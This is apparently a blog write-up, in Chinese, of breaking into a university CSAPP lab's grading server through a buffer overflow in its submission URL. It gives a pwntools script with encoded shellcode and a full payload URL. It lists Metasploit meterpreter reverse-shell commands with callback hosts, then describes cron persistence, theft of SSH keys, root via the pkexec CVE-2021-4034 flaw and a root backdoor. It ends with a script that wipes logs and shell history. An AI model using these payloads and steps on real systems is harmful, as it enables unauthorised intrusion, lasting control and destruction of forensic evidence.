渗透csapp lab3
源码审计
ida逆向源码得到提交格式
1
| http://10.12.13.30:18224/csapp/submitr.pl/?userid=<学号>&password=<密码>&lab=<随便填个数字>&result=1:<cookie>:<我们的输出,用十六进制数加空格表示二进制>&submit=submit
|
本地测试
先通过python脚本,调试出可以在本地引起CPU爆满的payload(每个学号对应的缓冲区地址不一样,提前测试好,确认可以rce。在buf里面填入二进制炸弹)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
| from pwn import * #引入pwn库,方便和bufbomb互动
context.log_level="debug" #debug模式,可以看到交互时的输入输出
p=process(["./bufbomb_","-u","2023302646",'-p','666666','-s'])#将实验题和需要的参数打包成对象,其中”-s”代表提交
# attach(p,'''
# finish
# finish
# finish
# finish
# finish
# ''')#在下次交互时设置断点
# pause()#暂停,输入任意键接着运行,
buf=asm("sub esp,0x300")
buf += b"\xbf\x14\xe3\x39\x24\xda\xda\xd9\x74\x24\xf4\x58"
buf += b"\x33\xc9\xb1\x1f\x31\x78\x15\x83\xe8\xfc\x03\x78"
buf += b"\x11\xe2\xe1\x89\x33\x7a\x38\x95\xb3\x61\x69\x6a"
buf += b"\x6f\x0c\x8f\xdc\xe9\x59\x6e\xd1\x76\xce\x2b\x82"
buf += b"\x59\x92\xa2\x9c\xce\x56\x34\x3e\x45\xde\xd5\x2a"
buf += b"\x3f\xb8\x45\xfa\xe8\xb1\x84\xbf\xdb\x42\xc3\x80"
buf += b"\x9d\x5b\x85\x74\x63\x34\xbb\x75\x9b\xc4\xe3\x1f"
buf += b"\x9b\xae\x16\x69\x78\x1f\xd1\xa4\xff\xe5\x21\x4f"
buf += b"\xbd\x0d\x86\x02\xba\x68\xc8\x72\xc5\x8a\x41\x91"
buf += b"\x04\x61\x5d\x97\x64\x7a\xed\x6a\xa6\x03\x88\x55"
buf += b"\x40\x14\xc9\xdc\x50\x8d\x5f\xb4\x22\xad\x52\xc9"
buf += b"\xc6\x72\x14\xc8\x37\x93\x5c\xcd\xc7\x54\x9c\x75"
buf += b"\xc6\x54\x9c\x89\x04\xd4"
payload=24*b'a'+b'b'*20+p32(0x55683b28)#+buf
p.sendlineafter(":",payload)
p.interactive()#将程序的交互权从脚本交给用户
|
把学号密码和payload代入提交格式(下面的是反弹shell的马,并非二进制炸弹)举个例子罢了
1
| http://10.12.13.30:18224/csapp/submitr.pl/?userid=2023302753&password=666666&lab=123&result=1:335a79b1:61%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2028%203b%2068%2055%2081%20ec%2000%2003%2000%2000%20ba%2067%2044%20c5%2016%20d9%20ee%20d9%2074%2024%20f4%205e%2031%20c9%20b1%201f%2031%2056%2015%2003%2056%2015%2083%20c6%2004%20e2%2092%202e%20cf%2048%206d%2074%2038%2097%20de%20c9%2094%2032%20e2%207d%207c%204a%2003%20b0%2001%20db%2098%2023%2008%20c4%2003%20a0%2064%2006%203b%20d7%203e%208f%20da%208d%20d8%20d7%204c%2003%2072%2061%208d%20e0%20b1%20f1%20c8%2027%2030%20eb%209c%20d3%20fe%2063%2082%201c%2001%2074%209a%2076%2001%201e%201f%200e%20e2%20ef%20d6%20dd%2065%208a%2028%20a4%20d8%207e%208f%20e5%2024%2038%20cf%2019%202b%203a%2046%20fa%20ea%20d1%2054%203c%200f%2029%20d4%20c3%201d%20b2%2091%20fc%20e6%20a3%20c2%2075%20f7%205d%2046%20ef%2048%205e%206b%2070%202d%20a1%200b%2073%20d1%20c3%2053%2072%202d%2004%20a3%20ce%202c%2004%20a3%2030%20e2%2084%200a&submit=submit
|
本地测试,访问同构的url,发现服务器崩溃,rce确实存在
正式攻击
此时将buf换为msf构造的反弹shell的马,重新构造url即可
用msfconsole连接马
1
2
3
4
5
| use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 10.12.13.30
set LPORT 15213
exploit
|
发现马并不持久,总是一闪而过,已知该主机有perl和python写入一个python马
1
| msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.32.29.20 LPORT=8010 -b "\x0a" -a x86 --platform linux -f python > shellcode.txt
|
再连接python马,实现无限时间的shell
上传一个马,写入定时任务,做一个初步持久化
使用msf的exp,夺取ssh证书,拿到ssh权限
提权
随后在一个夜深人静的晚上,开始测试提权
发现了一个特好用的辅助提权工具
linux-exploit-suggester
下载
1
| git clone https://github.com/The-Z-Labs/linux-exploit-suggester.git
|
使用
1
2
3
4
5
6
| #1.评估当前Linux在公开的已知漏洞上的曝光情况:
$ ./linux-exploit-suggester.sh
#2.显示当前Linux机器上安全功能的状态
$ ./linux-exploit-suggester.sh --checksec
#3.根据提供的'uname'字符串(即uname -a命令的输出)评估Linux内核在公开已知漏洞中的暴露情况
$ ./linux-exploit-suggester.sh --uname <uname-string>
|
发现了一个范围特广的提权漏洞
CVE-2021-4034 polkit(pkexec)提权漏洞
https://cloud.tencent.com/developer/article/1945253
获得root权限
权限维持
上传一个马到root文件夹.restart
写入定时任务 正向shell注意带上timeout否则会不断开好多,导致无法连接
完成权限维持后
清除痕迹(这个清的不干净,网络连接信息没清掉,后面找个详细的)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| #!/usr/bin/bash
echo > /var/log/syslog
echo > /var/log/messages
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/xferlog
echo > /var/log/secure
echo > /var/log/auth.log
echo > /var/log/user.log
echo > /var/log/wtmp
echo > /var/log/lastlog
echo > /var/log/btmp
echo > /var/run/utmp
rm ~/./bash_history
history -c
|